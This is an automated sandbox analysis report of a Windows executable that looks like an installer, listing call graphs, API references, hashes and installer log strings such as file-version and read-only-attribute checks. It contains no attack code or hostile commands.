60397->60388 60412 420070 12 API calls 60397->60412 60410 41a314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 60399->60410 60402 420697 60403 4206b3 MulDiv 60402->60403 60404 4206d6 60402->60404 60403->60404 60404->60388 60405 4206df MulDiv 60404->60405 60405->60388 60407 415b52 60406->60407 60416 414480 60407->60416 60409 415b6a 60409->60391 60410->60390 60411->60397 60412->60402 60413->60389 60414->60393 60415->60394 60417 41449a 60416->60417 60420 410658 60417->60420 60419 4144b0 60419->60409 60423 40dea4 60420->60423 60422 41065e 60422->60419 60424 40df06 60423->60424 60425 40deb7 60423->60425 60430 40df14 60424->60430 60428 40df14 19 API calls 60425->60428 60429 40dee1 60428->60429 60429->60422 60431 40df24 60430->60431 60433 40df3a 60431->60433 60442 40d7e0 60431->60442 60462 40e29c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60431->60462 60445 40e14c 60433->60445 60436 40d7e0 5 API calls 60437 40df42 60436->60437 60437->60436 60438 40dfae 60437->60438 60448 40dd60 60437->60448 60440 40e14c 5 API calls 60438->60440 60441 40df10 60440->60441 60441->60422 60463 40ec08 60442->60463 60471 40d6bc 60445->60471 60449 40e154 5 API calls 60448->60449 60450 40dd93 60449->60450 60451 40eb6c 5 API calls 60450->60451 60452 40dd9e 60451->60452 60453 40eb6c 5 API calls 60452->60453 60454 40dda9 60453->60454 60455 40ddc4 60454->60455 60456 40ddbb 60454->60456 60461 40ddc1 60454->60461 60480 40dbd8 60455->60480 60483 40dcc8 19 API calls 60456->60483 60459 403420 4 API calls 60460 40de8f 60459->60460 60460->60437 60461->60459 60462->60431 60466 40d980 60463->60466 60467 40d98b 60466->60467 60468 40d7ea 60467->60468 60470 40d9cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60467->60470 60468->60431 60470->60467 60472 40ec08 5 API calls 60471->60472 60473 40d6c9 60472->60473 60474 40d6dc 60473->60474 60478 40ed0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60473->60478 60474->60437 60476 40d6d7 60479 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60476->60479 60478->60476 60479->60474 60484 40ad7c 19 API calls 60480->60484 60482 40dc00 60482->60461 60483->60461 60484->60482 60485 440be8 60486 440bf1 60485->60486 60487 440bff WriteFile 60485->60487 60486->60487 60488 440c0a 60487->60488 60489 40ce34 60492 406f18 WriteFile 60489->60492 60493 406f35 60492->60493 60494 4222f4 60495 422303 60494->60495 60500 421284 60495->60500 60497 422323 60501 4212f3 60500->60501 60502 421293 60500->60502 60503 421304 60501->60503 60525 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 60501->60525 60502->60501 60524 408d34 19 API calls 60502->60524 60505 421332 60503->60505 60508 4213ca 60503->60508 60507 4213a5 60505->60507 60513 42134d 60505->60513 60506 4213a3 60509 4213f6 60506->60509 60527 421e3c 11 API calls 60506->60527 60507->60506 60515 4213b9 60507->60515 60508->60506 60510 4213de SetMenu 60508->60510 60528 4211cc 10 API calls 60509->60528 60510->60506 60513->60506 60518 421370 GetMenu 60513->60518 60514 4213fd 60514->60497 60523 4221f8 10 API calls 60514->60523 60517 4213c2 SetMenu 60515->60517 60517->60506 60519 421393 60518->60519 60520 42137a 60518->60520 60526 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 60519->60526 60522 42138d SetMenu 60520->60522 60522->60519 60523->60497 60524->60502 60525->60503 60526->60506 60527->60509 60528->60514 60529 44acfc 60530 44ad29 60529->60530 60531 44ad0a 60529->60531 60531->60530 60532 44abe0 11 API calls 60531->60532 60532->60530 60533 447f7c 60534 447fb1 60533->60534 60535 447faa 60533->60535 60536 447fd0 60534->60536 60537 447fba 60534->60537 60538 403400 4 API calls 60535->60538 60540 403494 4 API calls 60536->60540 60579 447d80 7 API calls 60537->60579 60542 44815b 60538->60542 60541 447fde 60540->60541 60545 4037b8 4 API calls 60541->60545 60543 447fc5 60543->60536 60544 447fc9 60543->60544 60544->60535 60546 447ffa 60545->60546 60547 4037b8 4 API calls 60546->60547 60548 448016 60547->60548 60548->60535 60549 44802a 60548->60549 60550 4037b8 4 API calls 60549->60550 60551 448044 60550->60551 60552 431424 4 API calls 60551->60552 60553 448066 60552->60553 60554 4314f4 4 API calls 60553->60554 60559 448086 60553->60559 60554->60553 60555 4480dc 60568 441b88 60555->60568 60557 4480c4 60557->60555 60581 442e24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60557->60581 60559->60557 60580 442e24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60559->60580 60561 448110 GetLastError 60582 447d14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60561->60582 60563 44811f 60583 442e64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60563->60583 60565 448134 60584 442e74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60565->60584 60567 44813c 60569 442b66 60568->60569 60570 441bc1 60568->60570 60572 403400 4 API calls 60569->60572 60571 403400 4 API calls 60570->60571 60573 441bc9 60571->60573 60574 442b7b 60572->60574 60575 431424 4 API calls 60573->60575 60574->60561 60577 441bd5 60575->60577 60576 442b56 60576->60561 60577->60576 60585 441260 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60577->60585 60579->60543 60580->60559 60581->60555 60582->60563 60583->60565 60584->60567 60585->60577 60586 47ef3e 60587 450664 5 API calls 60586->60587 60588 47ef52 60587->60588 60589 47e064 21 API calls 60588->60589 60590 47ef76 60589->60590 60591 40d07c 60592 40d084 60591->60592 60593 40d0b2 60592->60593 60594 40d0a7 60592->60594 60602 40d0ae 60592->60602 60596 40d0b6 60593->60596 60597 40d0c8 60593->60597 60604 4062a0 GlobalHandle GlobalUnlock GlobalFree 60594->60604 60603 406274 GlobalAlloc GlobalLock 60596->60603 60605 406284 GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 60597->60605 60600 40d0c4 60601 408cc4 5 API calls 60600->60601 60600->60602 60601->60602 60603->60600 60604->60602 60605->60600 60606 4165fc 73A25CF0 60607 30e1070 60608 30e107c 60607->60608 60610 30e1084 60607->60610 60609 30e1092 60610->60609 60612 45cff4 5 API calls 60610->60612 60611 30e10d3 60612->60611
                                                                              Strings
                                                                              • Installing into GAC, xrefs: 004706D1
                                                                              • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046FE7A
                                                                              • Will register the file (a DLL/OCX) later., xrefs: 004704DC
                                                                              • Dest filename: %s, xrefs: 0046F878
                                                                              • Version of our file: %u.%u.%u.%u, xrefs: 0046FAD4
                                                                              • Stripped read-only attribute., xrefs: 0046FEAB
                                                                              • Version of existing file: %u.%u.%u.%u, xrefs: 0046FB60
                                                                              • Incrementing shared file count (32-bit)., xrefs: 00470562
                                                                              • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046FC99
                                                                              • Time stamp of our file: %s, xrefs: 0046F97F
                                                                              • User opted not to overwrite the existing file. Skipping., xrefs: 0046FE31
                                                                              • Same time stamp. Skipping., xrefs: 0046FD39
                                                                              • -- File entry --, xrefs: 0046F6DF
                                                                              • Existing file has a later time stamp. Skipping., xrefs: 0046FDB3
                                                                              • Incrementing shared file count (64-bit)., xrefs: 00470549
                                                                              • Time stamp of existing file: (failed to read), xrefs: 0046FA1B
                                                                              • Non-default bitness: 32-bit, xrefs: 0046F89F
                                                                              • .tmp, xrefs: 0046FF9B
                                                                              • Failed to strip read-only attribute., xrefs: 0046FEB7
                                                                              • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 0046FCB4
                                                                              • Will register the file (a type library) later., xrefs: 004704D0
                                                                              • Uninstaller requires administrator: %s, xrefs: 00470159
                                                                              • , xrefs: 0046FBB3, 0046FD84, 0046FE02
                                                                              • Installing the file., xrefs: 0046FEED
                                                                              • @, xrefs: 0046F794
                                                                              • InUn, xrefs: 00470129
                                                                              • Dest file exists., xrefs: 0046F99F
                                                                              • Time stamp of existing file: %s, xrefs: 0046FA0F
                                                                              • Skipping due to "onlyifdoesntexist" flag., xrefs: 0046F9B2
                                                                              • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046FCA8
                                                                              • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FDD0
                                                                              • Existing file is a newer version. Skipping., xrefs: 0046FBE6
                                                                              • Dest file is protected by Windows File Protection., xrefs: 0046F8D1
                                                                              • Non-default bitness: 64-bit, xrefs: 0046F893
                                                                              • Same version. Skipping., xrefs: 0046FCC9
                                                                              • Version of existing file: (none), xrefs: 0046FCDE
                                                                              • Couldn't read time stamp. Skipping., xrefs: 0046FD19
                                                                              • Time stamp of our file: (failed to read), xrefs: 0046F98B
                                                                              • Version of our file: (none), xrefs: 0046FAE0
                                                                              • Skipping due to "onlyifdestfileexists" flag., xrefs: 0046FEDE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                              • API String ID: 0-4021121268
                                                                              • Opcode ID: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                              • Instruction ID: cb3b5b092a3a8f8c122efd66c5c5c6ee12dad63ca724b3077347a87130114cb0
                                                                              • Opcode Fuzzy Hash: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                              • Instruction Fuzzy Hash: 9B928234A04288DFCB11DFA5D445BDDBBB1AF05304F5480ABE884BB392D7789E49CB5A

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1530 42dfc4-42dfd5 1531 42dfe0-42e005 AllocateAndInitializeSid 1530->1531 1532 42dfd7-42dfdb 1530->1532 1533 42e1af-42e1b7 1531->1533 1534 42e00b-42e028 GetVersion 1531->1534 1532->1533 1535 42e041-42e043 1534->1535 1536 42e02a-42e03f GetModuleHandleA GetProcAddress 1534->1536 1537 42e045-42e053 CheckTokenMembership 1535->1537 1538 42e06a-42e084 GetCurrentThread OpenThreadToken 1535->1538 1536->1535 1539 42e191-42e1a7 FreeSid 1537->1539 1540 42e059-42e065 1537->1540 1541 42e086-42e090 GetLastError 1538->1541 1542 42e0bb-42e0e3 GetTokenInformation 1538->1542 1540->1539 1545 42e092-42e097 call 4031bc 1541->1545 1546 42e09c-42e0af GetCurrentProcess OpenProcessToken 1541->1546 1543 42e0e5-42e0ed GetLastError 1542->1543 1544 42e0fe-42e122 call 402648 GetTokenInformation 1542->1544 1543->1544 1547 42e0ef-42e0f9 call 4031bc * 2 1543->1547 1556 42e130-42e138 1544->1556 1557 42e124-42e12e call 4031bc * 2 1544->1557 1545->1533 1546->1542 1550 42e0b1-42e0b6 call 4031bc 1546->1550 1547->1533 1550->1533 1559 42e13a-42e13b 1556->1559 1560 42e16b-42e189 call 402660 CloseHandle 1556->1560 1557->1533 1563 42e13d-42e150 EqualSid 1559->1563 1560->1539 1567 42e152-42e15f 1563->1567 1568 42e167-42e169 1563->1568 1567->1568 1571 42e161-42e165 1567->1571 1568->1560 1568->1563 1571->1560
                                                                              APIs
                                                                              • AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFFE
                                                                              • GetVersion.KERNEL32(00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E01B
                                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E034
                                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E03A
                                                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E04F
                                                                              • FreeSid.ADVAPI32(00000000,0042E1AF,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                              • String ID: CheckTokenMembership$advapi32.dll
                                                                              • API String ID: 2252812187-1888249752
                                                                              • Opcode ID: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                              • Instruction ID: 81e9a68d7eb5b753086264e3ea48cb09d3699a943d7b2bc0788aba7922d59162
                                                                              • Opcode Fuzzy Hash: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                              • Instruction Fuzzy Hash: DE51B271B40625AEEB10EAF69C42BBF77ACDB09704F54047BB900F7282D5BC89158A69

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1860 423c1c-423c50 1861 423c52-423c53 1860->1861 1862 423c84-423c9b call 423b78 1860->1862 1863 423c55-423c71 call 40b44c 1861->1863 1868 423cfc-423d01 1862->1868 1869 423c9d 1862->1869 1889 423c73-423c7b 1863->1889 1890 423c80-423c82 1863->1890 1870 423d03 1868->1870 1871 423d37-423d3c 1868->1871 1872 423ca3-423ca6 1869->1872 1873 423d60-423d70 1869->1873 1879 423fc1-423fc9 1870->1879 1880 423d09-423d11 1870->1880 1874 423d42-423d45 1871->1874 1875 4240aa-4240b8 IsIconic 1871->1875 1881 423cd5-423cd8 1872->1881 1882 423ca8 1872->1882 1877 423d72-423d77 1873->1877 1878 423d7b-423d83 call 4241a4 1873->1878 1883 4240e6-4240fb call 424860 1874->1883 1884 423d4b-423d4c 1874->1884 1885 424162-42416a 1875->1885 1894 4240be-4240c9 GetFocus 1875->1894 1891 423d88-423d90 call 4241ec 1877->1891 1892 423d79-423d9c call 423b94 1877->1892 1878->1885 1879->1885 1886 423fcf-423fda call 4181f0 1879->1886 1895 423f23-423f4a SendMessageA 1880->1895 1896 423d17-423d1c 1880->1896 1887 423db9-423dc0 1881->1887 1888 423cde-423cdf 1881->1888 1897 423e06-423e16 call 423b94 1882->1897 1898 423cae-423cb1 1882->1898 1883->1885 1901 423d52-423d55 1884->1901 1902 4240fd-424104 1884->1902 1899 424181-424187 1885->1899 1886->1885 1948 423fe0-423fef call 4181f0 IsWindowEnabled 1886->1948 1887->1885 1911 423dc6-423dcd 1887->1911 1912 423ce5-423ce8 1888->1912 1913 423f4f-423f56 1888->1913 1889->1899 1890->1862 1890->1863 1891->1885 1892->1885 1894->1885 1906 4240cf-4240d8 call 41f004 1894->1906 1895->1885 1914 423d22-423d23 1896->1914 1915 42405a-424065 1896->1915 1897->1885 1907 423cb7-423cba 1898->1907 1908 423e2e-423e4a PostMessageA call 423b94 1898->1908 1917 424130-424137 1901->1917 1918 423d5b 1901->1918 1928 424106-424119 call 4244e4 1902->1928 1929 42411b-42412e call 42453c 1902->1929 1906->1885 1961 4240de-4240e4 SetFocus 1906->1961 1925 423cc0-423cc3 1907->1925 1926 423eb5-423ebc 1907->1926 1908->1885 1911->1885 1931 423dd3-423dd9 1911->1931 1932 423cee-423cf1 1912->1932 1933 423e4f-423e6f call 423b94 1912->1933 1913->1885 1921 423f5c-423f61 call 404e54 1913->1921 1934 424082-42408d 1914->1934 1935 423d29-423d2c 1914->1935 1915->1885 1919 42406b-42407d 1915->1919 1952 42414a-424159 1917->1952 1953 424139-424148 1917->1953 1936 42415b-42415c call 423b94 1918->1936 1919->1885 1921->1885 1943 423cc9-423cca 1925->1943 1944 423dde-423dec IsIconic 1925->1944 1945 423ebe-423ed1 call 423b24 1926->1945 1946 423eef-423f00 call 423b94 1926->1946 1928->1885 1929->1885 1931->1885 1949 423cf7 1932->1949 1950 423e1b-423e29 call 424188 1932->1950 1975 423e93-423eb0 call 423a94 PostMessageA 1933->1975 1976 423e71-423e8e call 423b24 PostMessageA 1933->1976 1934->1885 1937 424093-4240a5 1934->1937 1954 423d32 1935->1954 1955 423f66-423f6e 1935->1955 1984 424161 1936->1984 1937->1885 1962 423cd0 1943->1962 1963 423da1-423da9 1943->1963 1969 423dfa-423e01 call 423b94 1944->1969 1970 423dee-423df5 call 423bd0 1944->1970 1989 423ee3-423eea call 423b94 1945->1989 1990 423ed3-423edd call 41ef68 1945->1990 1994 423f02-423f08 call 41eeb4 1946->1994 1995 423f16-423f1e call 423a94 1946->1995 1948->1885 1991 423ff5-424004 call 4181f0 IsWindowVisible 1948->1991 1949->1936 1950->1885 1952->1885 1953->1885 1954->1936 1955->1885 1960 423f74-423f7b 1955->1960 1960->1885 1977 423f81-423f90 call 4181f0 IsWindowEnabled 1960->1977 1961->1885 1962->1936 1963->1885 1978 423daf-423db4 call 422c5c 1963->1978 1969->1885 1970->1885 1975->1885 1976->1885 1977->1885 2007 423f96-423fac call 412320 1977->2007 1978->1885 1984->1885 1989->1885 1990->1989 1991->1885 2012 42400a-424055 GetFocus call 4181f0 SetFocus call 415250 SetFocus 1991->2012 2005 423f0d-423f10 1994->2005 1995->1885 2005->1995 2007->1885 2015 423fb2-423fbc 2007->2015 2012->1885 2015->1885
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                              • Instruction ID: b8faa7015d3197e79f6d1719c020e5f6697e37216349d11362fcbf3b9a892ac2
                                                                              • Opcode Fuzzy Hash: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                              • Instruction Fuzzy Hash: 42E1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE91DB08
                                                                              APIs
                                                                                • Part of subcall function 00493D2C: GetWindowRect.USER32(00000000), ref: 00493D42
                                                                              • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00466E8B
                                                                                • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00466EA5), ref: 0041D6EB
                                                                                • Part of subcall function 00466898: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                                • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
                                                                                • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                                • Part of subcall function 00466254: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                                • Part of subcall function 00493FB0: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00493FBA
                                                                                • Part of subcall function 0042EBAC: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                                • Part of subcall function 0042EBAC: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                • Part of subcall function 00493C7C: 73A1A570.USER32(00000000,?,?,?), ref: 00493C9E
                                                                                • Part of subcall function 00493C7C: SelectObject.GDI32(?,00000000), ref: 00493CC4
                                                                                • Part of subcall function 00493C7C: 73A1A480.USER32(00000000,?,00493D22,00493D1B,?,00000000,?,?,?), ref: 00493D15
                                                                                • Part of subcall function 00493FA0: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00493FAA
                                                                              • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0212D868,0212F4BC,?,?,0212F4EC,?,?,0212F53C,?), ref: 00467B3B
                                                                              • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00467B4C
                                                                              • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00467B64
                                                                                • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                              • String ID: $(Default)$STOPIMAGE
                                                                              • API String ID: 3271511185-770201673
                                                                              • Opcode ID: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                              • Instruction ID: 7cc469b3bd63a428f44d838a58e066ff967143afc9c1970ffe4cf99f77f4ae1f
                                                                              • Opcode Fuzzy Hash: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                              • Instruction Fuzzy Hash: 9DF2C6386005148FCB00EB59D5D9F9973F1FF4A308F1542B6E5049B36ADB78AC4ACB8A
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 00473F61
                                                                              • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047403E
                                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047404C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID: unins$unins???.*
                                                                              • API String ID: 3541575487-1009660736
                                                                              • Opcode ID: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                              • Instruction ID: 4fd1d9fbc71e550ec417509903356e65f0bc22e0d19a654d6a5f314750c2dfa9
                                                                              • Opcode Fuzzy Hash: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                              • Instruction Fuzzy Hash: 3D3163746001489FCB20EB65C981AEEB7BDDF84304F5184B6E50CAB2A2DB39DF458F58
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 004520FD
                                                                              • GetLastError.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 00452105
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileFindFirstLast
                                                                              • String ID:
                                                                              • API String ID: 873889042-0
                                                                              • Opcode ID: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                              • Instruction ID: f9611aeb3029889b76a7ade8829495a9d918b249c8fbd3e45bbd36cd3e6629b4
                                                                              • Opcode Fuzzy Hash: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                              • Instruction Fuzzy Hash: 1DF04931A04604AB8B10DB6AAD0149FB7FCDB46725710467BFC14E3282EA784E088598
                                                                              APIs
                                                                              • GetVersion.KERNEL32(?,0046D1AE), ref: 0046D122
                                                                              • CoCreateInstance.OLE32(00498B64,00000000,00000001,00498B74,?,?,0046D1AE), ref: 0046D13E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstanceVersion
                                                                              • String ID:
                                                                              • API String ID: 1462612201-0
